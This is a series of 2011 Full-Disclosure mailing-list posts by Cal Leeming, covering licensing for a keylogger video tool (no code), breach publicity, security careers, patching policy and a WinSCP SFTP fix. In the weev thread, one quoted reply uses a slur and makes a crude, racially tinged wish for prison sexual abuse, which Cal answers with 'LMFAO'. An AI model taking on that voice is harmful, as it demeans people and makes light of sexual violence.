Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell

[Cal Leeming [Simplicity Media Ltd]]

Lmao @ WTFPL. I'm gonna use that :D

On Wed, Jan 26, 2011 at 6:19 PM, Steve Pinkham wrote:

> On 01/26/2011 12:58 PM, Juan Sacco wrote:
> > The tool doesnt have any licence, we are using Python and Ruby. The
> > download size is 120mb
> >
> > Thanks for your interest!
> > Juan Sacco
> >
>
> OK, let's clarify the reasoning behind the questions:
>
> >> 1) What is the license?
> Under copyright law, I can't redistribute someone else's work without
> permission.  This permission is usually given in the form of a license
> grant of some sort. You can choose a open source license like BSD or
> GPL, or a freeware license grant, many examples of which can be found by
> searching the net for "freeware license".
>
> A simple "You may copy or distribute this software free of charge".or
> "This program may be freely distributed" is good enough in most locations.
>
> If you like being awesome(and who doesn't), you can try out the WTFPL.
> No better (and might be worse) then the simple statements above, but who
> cares? Isn't awesome the goal?
>
> http://sam.zoy.org/wtfpl/
>
> >> 2) What is included that you don't hold the copyright to?
> Much like the above, I need some legal reassurance that no one else can
> make copyright claims and sue me for infringement for hosting this
> download.  To verify this, I need to know who owns the copyrights for
> other software you have included, so I can verify your license is
> compatible with their license, and that I can distribute it legally.
>
> >> 3) What is the size of the download?
>
> This one was answered! That's 1 out of 3.. 2 more left for free hosting!
>
> Steve
> --
>  | Steven Pinkham, Security Consultant|
>  | http://www.mavensecurity.com   |
>  | GPG public key ID CD31CAFB |
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] "Hacker attacks won't hurt your company brand"

[Cal Leeming [Simplicity Media Ltd]]

It all depends what kind of breach happened.

Breaches caused by script kiddies and their automated kits, aren't exactly
very high profile, and usually come from poor security ethics surrounding
the infrastructure (i.e. lack of updates, no NIDS in place, no port
blocking, no IP whitelisting etc etc). Falling under this category would
certainly NOT be credible to the company, as it shows their security game is
piss poor.

Breaches caused by rouge internal staff members, or where the company has
been specifically targeted for a long play, would be the only circumstances
where the publicity could actually be beneficial, as it creates interesting
controversy, unlike the latter.

All the above is just my opinion though, not proven fact (although I've
headed up enough disaster recovery contracts after both ext and int breaches
to have a clear insight as to how these kinda things go down)

On Fri, Jan 21, 2011 at 11:02 AM, imipak  wrote:

> "...the idea that a breach is unlikely to kill your organization is
> spreading, because it’s backed by data."
>
> " If you’ve been spreading FUD [..] you’re going to face some harsh
> questions. By regularly making claims which turn out to be false, people
> undermine their credibility. If you’re one of those people, expect questions
> from those outside security who’ve heard you make the claim."
>
> "If you’re still doing it, you’re creating problems for yourself. Even
> worse, you’re creating problems for security professionals in general."
>
> (Adam Shostack,
> http://newschoolsecurity.com/2011/01/a-day-of-reckoning-is-coming/ )
>
>
> Anyone?
>
> -i
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Path to IT Security

[Cal Leeming [Simplicity Media Ltd]]

Emmanuel, Can I also just say here, that being an expert in any area of IT
isn't about qualifications, it's a state of mind, a mentality. There a
thousand and thousands of people out there that call themselves "qualified
professionals", and for 99% of them, that's all they will ever be. If you've
got the passion, then you'll go far. :)

On Thu, Jan 20, 2011 at 5:37 PM, Georgi Guninski wrote:

> hi,
>
> to get an answer, how do you imagine your best case scenario for you in
> "the world of IT security (and/or) security professional"?
>
> basically describe your dreams on the matter to get an answer on this nice
> list.
>
> On Tue, Jan 18, 2011 at 04:10:48PM +, Emmanuel Apreko wrote:
> > Hello All,
> >
> > I'm a newbie to this list and all i need is some guidance into the world
> of IT security. i have completed Comptia A+ and Network + and wish to pursue
> a career in security.
> >
> > After researching i found out that the most prestigious security
> certification is the CISSP and it seems like a very long journey to it since
> i have no experience in it at all but need to get my foot in.
> >
> > Could anyone please advise me on the best path to being a security
> professional? ie from beginner to pro?
> >
> > All advise will be well appreciated.
> >
> > Thanks
> >
> >
> >
>
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Getting Off the Patch

[Cal Leeming [Simplicity Media Ltd]]

failovers*

On Thu, Jan 20, 2011 at 2:16 AM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> If the IOS has a remote exp vuln, then hell yes. That is, until the client
> tells us to go f*ck ourselves as the downtime would affect their SLAs and
> they don't have fall overs in place. lol.
>
> On Thu, Jan 20, 2011 at 2:06 AM, Pete Smith wrote:
>
>> All,
>>
>> I agree with most of the stuff that Thor has been saying and from what I
>> have read this has mostly been centred around patching software on servers.
>> However most large companies take the don't patch or patch infrequently
>> stance when it comes to network infrastructure, Cisco, Juniper, 3COM, HP and
>> other large network infrastructure companies by no means have a clean record
>> when it comes to vulnerabilities in their software but yet businesses will
>> often not patch even in environments that are highly redundant and can be
>> rebooted with no or little impact.
>>
>> Can anyone seriously say that they patch every time Cisco releases a new
>> version of IOS?
>>
>> ...
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Getting Off the Patch

[Cal Leeming [Simplicity Media Ltd]]

If the IOS has a remote exp vuln, then hell yes. That is, until the client
tells us to go f*ck ourselves as the downtime would affect their SLAs and
they don't have fall overs in place. lol.

On Thu, Jan 20, 2011 at 2:06 AM, Pete Smith  wrote:

> All,
>
> I agree with most of the stuff that Thor has been saying and from what I
> have read this has mostly been centred around patching software on servers.
> However most large companies take the don't patch or patch infrequently
> stance when it comes to network infrastructure, Cisco, Juniper, 3COM, HP and
> other large network infrastructure companies by no means have a clean record
> when it comes to vulnerabilities in their software but yet businesses will
> often not patch even in environments that are highly redundant and can be
> rebooted with no or little impact.
>
> Can anyone seriously say that they patch every time Cisco releases a new
> version of IOS?
>
> ...
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (off topic) windows + debian + WinSCP + chroot'd shell + timestamp + SCP + SFTP + keep remote directory up to date

[Cal Leeming [Simplicity Media Ltd]]

*Before I start, this is totally NOT the right list for this discussion, but
I needed somewhere popular that would be indexed by Google, so anyone else
with the same problem won't go through the same two hours of bullshit I just
did. Anyone who bitches at me about this shall be declared king of the rank
"asshattery".*

--

WinSCP comes with this neat little feature called "Keep remote directory up
to date", and it worked for every server I used apart from one. It was
uploading all the files over and over again, even if only one of them had
changed.  At first I thought, maybe it was because of timestamp
configurations and version changes (i tried mixing dst / local conventions
preserve / non preserve etc), all with no success.

Then I realised, that the connection was falling back onto SCP silently,
rather than using SFTP. This was causing the feature to break.

If anyone else experiences this same issue, make sure to untick "Allow SCP
fallback", select SFTP as the file protocol, and if it throws an error, then
make sure SFTP is installed / configured correctly on the server.

Much love x x

Cal
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Career Criminal Andrew Auernheimer / Weev Is In Jail Right Now

[Cal Leeming [Simplicity Media Ltd]]

LMFAO.

On Wed, Jan 19, 2011 at 11:51 AM, huj huj huj  wrote:

> lets hope that cockgobbling retard gets a one way ticket to being tyrones
> cumdumpster
>
> 2011/1/18 coderman 
>
> sir,
>>
>> "quiet" is the absence of sound, akin to the absence of thought in your
>> reply.
>>
>>
>> On Tue, Jan 18, 2011 at 9:59 AM, Eyeballing Weev
>>  wrote:
>> > I guess you didn't get the memo about weev being in jail. ...
>> ...
>> > On 01/18/2011 12:48 PM, coderman wrote:
>> >> ... at least it will be a little more quiet without
>>  >> Augmammer spamming for a while ...
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Getting Off the Patch

[Cal Leeming [Simplicity Media Ltd]]

In that case, my two cents on the matter would be that the thought process
behind this "no patch method" has come from someone with very little
development and/or security background.

On Wed, Jan 19, 2011 at 9:16 AM, Christian Sciberras wrote:

> Ah, but that is YOUR argument. They don't seem to agree with it.
>
> Heck if they did, every single word so far would have been completely
> unnecessary, since layering security is what we've done ever since the first
> knife was invented!
>
>
>
>
>
>
>
>
> On Wed, Jan 19, 2011 at 10:13 AM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> Christian,
>>
>> There is no 'direct alternative' as we have already established that there
>> is no "be all and end all" for security, it's when you layer these factors
>> on top of each other that it becomes more effective.
>>
>> On Tue, Jan 18, 2011 at 11:45 PM, Christian Sciberras 
>> wrote:
>>
>>> I'm getting a bit annoyed reading over and over arguments which I've
>>> highlighted some time ago anyway (
>>> http://www.mail-archive.com/full-disclosure@lists.grok.org.uk/msg44454.html
>>> ).
>>>
>>> The real question, what is the *direct* alternative to patching?
>>>
>>> Don't say "sandboxing" because it doesn't always work.
>>> And don't tell me about only installing the system critical issues only -
>>> that's called "update by priority".
>>> Also, please remember that we are talking against patching, not
>>> discussing where patching works(/ is better) or not so I would expect any
>>> serious arguments to completely exclude patching.
>>>
>>> Regards,
>>> Chris.
>>>
>>>
>>>
>>>
>>>
>>>
>>> On Tue, Jan 18, 2011 at 9:05 PM, coderman  wrote:
>>>
>>>> On Tue, Jan 18, 2011 at 11:43 AM, phocean <0...@phocean.net> wrote:
>>>> > ... how is this new ? It has been the best
>>>> > practice of good system/security administrators for years.
>>>> >
>>>> > And it doesn't look like a "no patching" policy yet...
>>>>
>>>>
>>>> sure, .. though you've made me sad considering how few organizations
>>>> do "best practice, good system/security administration".
>>>>
>>>> not new, still difficult?   (~_~;)
>>>>
>>>>
>>>>  that leaves consensus:
>>>>"no patching" elusive, yet to be observed in real-world. (e.g.
>>>> yeti or bigfeets)
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Getting Off the Patch

[Cal Leeming [Simplicity Media Ltd]]

Christian,

There is no 'direct alternative' as we have already established that there
is no "be all and end all" for security, it's when you layer these factors
on top of each other that it becomes more effective.

On Tue, Jan 18, 2011 at 11:45 PM, Christian Sciberras wrote:

> I'm getting a bit annoyed reading over and over arguments which I've
> highlighted some time ago anyway (
> http://www.mail-archive.com/full-disclosure@lists.grok.org.uk/msg44454.html
> ).
>
> The real question, what is the *direct* alternative to patching?
>
> Don't say "sandboxing" because it doesn't always work.
> And don't tell me about only installing the system critical issues only -
> that's called "update by priority".
> Also, please remember that we are talking against patching, not discussing
> where patching works(/ is better) or not so I would expect any serious
> arguments to completely exclude patching.
>
> Regards,
> Chris.
>
>
>
>
>
>
> On Tue, Jan 18, 2011 at 9:05 PM, coderman  wrote:
>
>> On Tue, Jan 18, 2011 at 11:43 AM, phocean <0...@phocean.net> wrote:
>> > ... how is this new ? It has been the best
>> > practice of good system/security administrators for years.
>> >
>> > And it doesn't look like a "no patching" policy yet...
>>
>>
>> sure, .. though you've made me sad considering how few organizations
>> do "best practice, good system/security administration".
>>
>> not new, still difficult?   (~_~;)
>>
>>
>>  that leaves consensus:
>>"no patching" elusive, yet to be observed in real-world. (e.g.
>> yeti or bigfeets)
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Getting Off the Patch

[Cal Leeming [Simplicity Media Ltd]]

Allow me to clarify.

"Most seasoned/established IT professionals" wouldn't rely solely on patch
day.

"Most unskilled people"  shouldn't rely solely on patch day.

On Tue, Jan 18, 2011 at 5:04 PM,  wrote:

> On Mon, 17 Jan 2011 22:29:13 GMT, "Cal Leeming [Simplicity Media Ltd]"
> said:
>
> > Most people wouldn't rely solely on patch day to protect their
> > systems/network
>
> You're in for a surprise.
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/